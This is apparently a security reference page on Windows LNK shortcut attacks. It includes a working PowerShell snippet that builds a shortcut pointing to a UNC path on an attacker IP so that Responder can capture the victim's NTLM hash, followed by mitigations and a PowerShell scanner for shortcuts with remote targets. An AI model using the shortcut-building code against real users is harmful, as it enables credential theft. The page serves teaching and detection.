# LNK Attack

### Overview

A **LNK file attack** abuses Windows **shortcut (.lnk) files** to execute malicious commands when a user **clicks or previews** what appears to be a legitimate shortcut (e.g., *Invoice.pdf.lnk*).

### Prerequisites

1. The user must click or open the shortcut, or browse a directory containing the shortcut.
2. The attacker must be able to deliver the LNK file.

### Steps

1. The attacker creates a shortcut file whose target points to the attacker's IP address. For example:

   ```powershell
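   # Create a shortcut object through the WScript.Shell COM interface
   $objShell = New-Object -ComObject WScript.shell
   $lnk = $objShell.CreateShortcut("C:\test.lnk")
   # The target is a UNC path on the attacker's host
   $lnk.TargetPath = "\\192.168.138.149\@test.png"
   $lnk.WindowStyle = 1
   $lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
   $lnk.Description = "Test"
   $lnk.HotKey = "Ctrl+Alt+T"
   # Write the .lnk file to disk
   $lnk.Save()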
   ```
2. The user opens the shortcut or opens the directory containing the shortcut.
3. The malicious action executes under the user’s context. A connection is made to the attacker's host, where the NTLM hash can be captured using Responder.

### Mitigations

1. Disable or Restrict LNK Execution
2. Show File Extensions
3. Harden PowerShell
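
As a detection aid alongside these mitigations, the following added example (not part of the original page) audits a directory tree for shortcuts whose target, icon or working directory is a UNC path, which is the property the attack above relies on. The function name `Find-RemoteShortcut` and the `-Root` parameter are assumptions made for this example.

```powershell
# Added example: list .lnk files that reference a remote (UNC) location.
# Find-RemoteShortcut and -Root are hypothetical names chosen for this example.
function Find-RemoteShortcut {
    param(
        [Parameter(Mandatory)][string]$Root
    )
    $shell = New-Object -ComObject WScript.Shell
    # Matches \\host\... at the start of a path
    $uncPattern = '^\s*\\\\[^\\]+\\'

    Get-ChildItem -LiteralPath $Root -Filter *.lnk -Recurse -Force -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            try {
                # CreateShortcut on an existing path loads that shortcut's properties
                $lnk = $shell.CreateShortcut($file.FullName)
            } catch {
                return   # unreadable or malformed shortcut: skip to the next file
            }
            # IconLocation has the form "path,index"; keep only the path
            $iconPath = ($lnk.IconLocation -split ',')[0]
            $fields = [ordered]@{
                TargetPath       = $lnk.TargetPath
                IconLocation     = $iconPath
                WorkingDirectory = $lnk.WorkingDirectory
            }
            foreach ($name in $fields.Keys) {
                # Expand %VAR% so a variable cannot hide a UNC prefix
                $value = [Environment]::ExpandEnvironmentVariables([string]$fields[$name])
                if ($value -match $uncPattern) {
                    [pscustomobject]@{
                        Shortcut = $file.FullName
                        Field    = $name
                        Value    = $value
                        Modified = $file.LastWriteTime
                    }
                }
            }
        }
}

# Example run against a user-writable location
Find-RemoteShortcut -Root "$env:USERPROFILE\Desktop" | Format-Table -AutoSize
```

Shortcuts to legitimate file shares also match, so review the `Value` column against the hosts your environment is expected to use.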

